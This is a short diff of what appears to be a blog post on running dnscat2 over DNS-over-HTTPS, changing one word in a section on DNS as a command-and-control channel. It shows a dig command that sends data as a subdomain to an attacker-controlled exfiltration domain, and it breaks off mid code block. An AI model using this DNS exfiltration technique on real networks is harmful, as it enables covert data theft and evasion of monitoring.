phra/phra.github.io/posts/dnscat2-over-doh.md

 ## DNS as C2 Channel

-If we set up a NS record for `exfil.iwantmore.pizza` pointing to an IP that we control and we try to resolve a subdomain like this:
+If we set up a NS record for `exfil.iwantmore.pizza` pointing to an IP address that we control and we try to resolve a subdomain like this:

 ```bash
 root@kali:~$ dig 1234567890.exfil.iwantmore.pizza